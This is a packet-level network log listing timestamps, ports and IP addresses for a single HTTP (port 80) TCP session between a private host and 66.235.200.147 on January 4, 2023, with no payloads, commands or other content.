Jan 4, 2023 16:47:38.584331036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584337950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584357977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584366083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584386110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584393978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584418058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584422112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584445000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584449053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584474087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584477901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584500074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584506989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584533930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584537983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584559917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584559917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584577084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584589005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584614038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584615946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.584630966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.584666014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.585153103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.585180998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.585208893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.585222006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.585254908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.585254908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.585371971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.585438013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.586389065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.586472034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.586524010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.586643934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.586739063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.586920977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.586935043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.586998940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.587096930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.587287903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.587291956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.587342978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.587415934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.587505102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.587625027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.587723970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.587811947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.588104963 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.588258028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.588385105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.588403940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.588462114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.588511944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598004103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598040104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598067045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598093987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598109007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598119974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598149061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598155022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598171949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598213911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598270893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598330975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598357916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598382950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598400116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598408937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598417997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598434925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598460913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598468065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598468065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598486900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598512888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598537922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598563910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598579884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598579884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598579884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598579884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598591089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598607063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598618031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598639011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598643064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598669052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598716021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598733902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598733902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598733902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598733902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598746061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598773003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598782063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598798037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598814011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598824024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598844051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598850965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598858118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598876953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598891973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598903894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598928928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598936081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598936081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598954916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598963976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.598979950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.598994017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599004984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.599004984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599031925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.599037886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599057913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.599061966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599081039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599117041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599148989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.599217892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599747896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.599775076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.599809885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.599833965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599833965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599837065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.599878073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599911928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.599957943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.599983931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600012064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600028992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600029945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600054979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600071907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600080967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600099087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600117922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600125074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600142002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600173950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600187063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600488901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600564003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600668907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600693941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600737095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600738049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600760937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600764990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600790024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600805044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600816011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600828886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600857019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600857973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600867987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600886106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600910902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600913048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600935936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600936890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600961924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600961924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.600986958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.600989103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601015091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601018906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601041079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601048946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601066113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601068974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601088047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601093054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601116896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601141930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601790905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601816893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601841927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601855040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601866961 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601881027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601896048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601921082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601929903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601929903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601947069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601955891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601967096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.601974010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.601995945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602000952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602025986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602026939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602052927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602055073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602077961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602082014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602107048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602108955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602127075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602134943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602158070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602160931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602180004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602188110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602214098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602216005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602261066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602610111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602637053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602648020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602662086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602667093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602699995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602706909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602742910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602745056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602766991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602770090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602794886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602821112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602823973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602848053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602858067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602874041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602889061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602900028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602909088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602926016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602932930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602952003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602962017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.602977991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.602987051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603004932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603013992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603030920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603039026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603058100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603065014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603084087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603106976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603615046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603640079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603665113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603677988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603691101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603704929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603717089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603729010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603743076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603751898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603770018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603775978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603794098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603796959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603821993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603823900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603841066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603851080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603876114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603878021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603899002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603903055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603926897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603928089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603955030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.603962898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603979111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.603981018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604005098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.604006052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604027987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.604033947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604058027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.604059935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604084015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.604110956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.604609966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604635954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604660034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604681015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.604685068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604712963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604718924 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.604738951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604763985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604772091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.604787111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.604866028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.604866028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.727667093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727704048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727726936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727746964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727767944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727787971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727807999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727828979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727847099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727869034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727889061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727909088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727929115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727950096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727969885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.727994919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728014946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728035927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728056908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728075981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728096008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728116035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728118896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728118896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728118896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728118896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728118896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728136063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728157043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728174925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728174925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728178024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728174925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728220940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728224993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728235006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728240013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728261948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728276968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728287935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728305101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728312969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.728329897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.728341103 CET	80	49696	66.235.200.147	192.168.2.4
